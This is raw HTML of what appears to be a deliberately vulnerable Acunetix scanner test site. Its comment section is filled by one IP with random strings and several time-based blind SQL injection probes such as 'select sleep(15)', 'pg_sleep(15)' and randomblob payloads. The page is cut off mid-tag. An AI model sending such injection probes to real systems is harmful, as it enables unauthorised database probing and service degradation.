Q29tbWVudGQCzgEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAs8BD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC0AEPZBYCZg8WAh8DBQdDb21tZW50ZALRAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC0gEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALTAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAtQBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALVAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAtYBD2QWAmYPFgIfAwUHQ29tbWVudGQC1wEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAtgBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC2QEPZBYCZg8WAh8DBQdDb21tZW50ZALaAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC2wEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALcAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAt0BD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALeAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAt8BD2QWAmYPFgIfAwUHQ29tbWVudGQC4AEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAuEBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC4gEPZBYCZg8WAh8DBQdDb21tZW50ZALjAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC5AEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALlAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAuYBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALnAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAugBD2QWAmYPFgIfAwUHQ29tbWVudGQC6QEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAuoBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC6wEPZBYCZg8WAh8DBQdDb21tZW50ZALsAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC7QEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALuAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAu8BD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALwAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAvEBD2QWAmYPFgIfAwUHQ29tbWVudGQC8gEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAvMBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC9AEPZBYCZg8WAh8DBQdDb21tZW50ZAL1AQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC9gEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAL3AQ9kFgJmDxYCHwMFB0NvbW1lbnRkAvgBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAL5AQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAvoBD2QWAmYPFgIfAwUHQ29tbWVudGQC+wEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAvwBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQC/QEPZBYCZg8WAh8DBQdDb21tZW50ZAL+AQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQC/wEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKAAg9kFgJmDxYCHwMFB0NvbW1lbnRkAoECD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKCAg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAoMCD2QWAmYPFgIfAwUHQ29tbWVudGQChAIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAoUCD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQChgIPZBYCZg8WAh8DBQdDb21tZW50ZAKHAg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCiAIPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKJAg9kFgJmDxYCHwMFB0NvbW1lbnRkAooCD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKLAg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAowCD2QWAmYPFgIfAwUHQ29tbWVudGQCjQIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAo4CD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCjwIPZBYCZg8WAh8DBQdDb21tZW50ZAKQAg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCkQIPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKSAg9kFgJmDxYCHwMFB0NvbW1lbnRkApMCD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKUAg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kApUCD2QWAmYPFgIfAwUHQ29tbWVudGQClgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kApcCD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCmAIPZBYCZg8WAh8DBQdDb21tZW50ZAKZAg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCmgIPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKbAg9kFgJmDxYCHwMFB0NvbW1lbnRkApwCD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKdAg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAp4CD2QWAmYPFgIfAwUHQ29tbWVudGQCnwIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAqACD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCoQIPZBYCZg8WAh8DBQdDb21tZW50ZAKiAg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCowIPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKkAg9kFgJmDxYCHwMFB0NvbW1lbnRkAqUCD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZGTWs+/Iej++9zSQEWIie24d0AfO+w==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLFy/vZCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDxAP8Hf3Pi3bsABvQ/4DsDTVwrl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:46:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:40 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN / sleep(15) </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN" / sleep(15) / "</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN and 0 in (select sleep(15) ) -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:26 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:42 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:43 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:43 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:43 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:43 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:43 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:53 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">"java.lang.Thread.sleep"(15000)</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:28 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:29 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN" and 0 in (select sleep(15) ) -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:13 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">case randomblob(10000000) when not null then 1 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">case randomblob(100000000) when not null then 1 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">case randomblob(1000000000) when not null then 1 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:47:10 AM</DIV><DIV 